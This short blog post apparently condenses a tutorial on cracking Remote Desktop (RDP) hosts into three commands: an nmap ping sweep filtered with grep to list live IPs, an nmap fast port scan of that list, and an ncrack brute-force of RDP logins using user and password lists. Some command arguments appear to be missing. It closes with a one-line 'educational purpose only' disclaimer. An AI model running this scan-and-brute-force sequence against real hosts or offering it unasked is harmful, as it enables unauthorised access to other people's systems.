Found a very well written tutorial on how to crack a RDP host here.

In less lines here is how-to:

[cc lang=”bash”]nmap -sP | grep -Eo ‘([0-9]{1,3}.){3}[0-9]{1,3}’ >[/cc]

[cc lang=”bash”]nmap -F -iL[/cc]

create a user list and a passwd list (my.usr & my.pwd)

[cc lang=”bash”]ncrack -vv -U my.usr -P my.pwd,CL=1[/cc]

thats it.

Do not use this tools on live production systems. Educational purpose only.